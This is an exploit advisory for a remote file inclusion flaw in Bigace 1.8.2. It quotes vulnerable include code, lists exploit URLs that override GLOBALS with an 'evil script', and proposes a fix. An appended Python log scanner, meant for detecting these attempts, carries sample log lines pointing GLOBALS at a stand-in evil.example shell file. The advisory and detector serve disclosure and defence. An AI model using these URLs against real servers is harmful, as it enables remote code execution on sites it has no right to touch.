
[Web Apps]Bigace 1.8.2 (GLOBALS) Remote File Inclusion

  Author : Vampire

Location : Iran - Tehran

HomePage : http://www.hackerz.ir

Email : Vampire_chiristof[at]yahoo[dot]com

Critical Level : Dangerous

---------------------------------------------------------------------------------------

Affected Software Description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Bigace

version : 1.8.2

URL : http://Bigace.sourceforge.net

---------------------------------------------------------------------------------------

Vulnerability:

~~~~~~~~~~~~~

In download.cmd.php, admin.cmd.php, upload_form.php and item_main.php we found the following vulnerable code. Each file builds an include path from $GLOBALS['_BIGACE']['DIR'] without defining or sanitizing it first, so when PHP's register_globals is enabled the path can be supplied from the request:

----------------------------------------admin.cmd.php------------------------------------------

....

<?php

require_once($GLOBALS['_BIGACE']['DIR']['admin'].'styling.php');

require_once($GLOBALS['_BIGACE']['DIR']['admin'].'functions.inc.php');

include_once($GLOBALS['_BIGACE']['DIR']['libs'].'io.inc.php');

?>

...

----------------------------------------download.cmd.php---------------------------------------

....

<?php

include_once($GLOBALS['_BIGACE']['DIR']['libs'].'io.inc.php');

?>

...

----------------------------------------upload_form.php----------------------------------------

....

<?php

require_once($GLOBALS['_BIGACE']['DIR']['admin'].'include/mode_constants.php');

?>

...

----------------------------------------item_main.php------------------------------------------

....

<?php

require_once($GLOBALS['_BIGACE']['DIR']['admin'].'include/mode_constants.php');

?>

...

Exploit:

~~~~~~~

http://www.target.com/[Bigace]/system/admin/include/item_main.php?GLOBALS=[Evil Script]

http://www.target.com/[Bigace]/system/admin/include/upload_form.php?GLOBALS=[Evil Script]

http://www.target.com/[Bigace]/system/command/download.cmd.php?GLOBALS=[Evil Script]

http://www.target.com/[Bigace]/system/command/admin.cmd.php?GLOBALS=[Evil Script]

Solution:

~~~~~~~~

Sanitize the $GLOBALS variable in download.cmd.php, admin.cmd.php, item_main.php and upload_form.php so that the include paths cannot be taken from request input.
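As an added example (not part of this advisory or of Bigace), the following Python script scans Apache-style access log lines for the pattern described above: requests that try to set a GLOBALS parameter, or that pass a remote URL as a parameter value. All log lines, IP addresses and hostnames in it are constructed for the demonstration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-log lines (not real traffic). The first two
# mimic a $GLOBALS override attempt against the files named in the advisory,
# the last two are benign requests.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2009:12:00:01 +0000] "GET /bigace/system/command/download.cmd.php?GLOBALS=http://evil.example/shell.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2009:12:00:02 +0000] "GET /bigace/system/admin/include/item_main.php?GLOBALS%5B_BIGACE%5D%5BDIR%5D%5Badmin%5D=http%3A%2F%2Fevil.example%2Fs.txt%3F HTTP/1.1" 200 512 "-" "curl/7.19"
198.51.100.4 - - [10/Mar/2009:12:00:03 +0000] "GET /bigace/index.php?id=42 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2009:12:00:04 +0000] "POST /bigace/system/admin/include/upload_form.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A parameter value that starts with a URL scheme is what a remote include needs.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftps?)://', re.IGNORECASE)


def analyze_request(target):
    """Return the reasons a request target looks like a $GLOBALS override / RFI attempt."""
    reasons = []
    query = urlsplit(target).query
    # parse_qsl percent-decodes keys and values, so GLOBALS%5B...%5D becomes GLOBALS[...]
    for key, value in parse_qsl(query, keep_blank_values=True):
        base_name = key.split('[', 1)[0]
        if base_name == 'GLOBALS':
            reasons.append(f'request parameter overrides $GLOBALS ({key!r})')
        if REMOTE_URL_RE.match(value):
            reasons.append(f'remote URL in parameter {key!r}')
    return reasons


def scan_log(text):
    """Return one finding per log line whose request target is suspicious."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = analyze_request(m['target'])
        if reasons:
            findings.append({'ip': m['ip'], 'path': urlsplit(m['target']).path, 'reasons': reasons})
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f['ip'], f['path'], '; '.join(f['reasons']))
```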

----------------------------------------------------------------------------------------

Shoutz:

~~~~~~

~ Special Greetz to My Best Friends Cephexin , Sh3ll , MFOX , Alijbs and All Real Hackers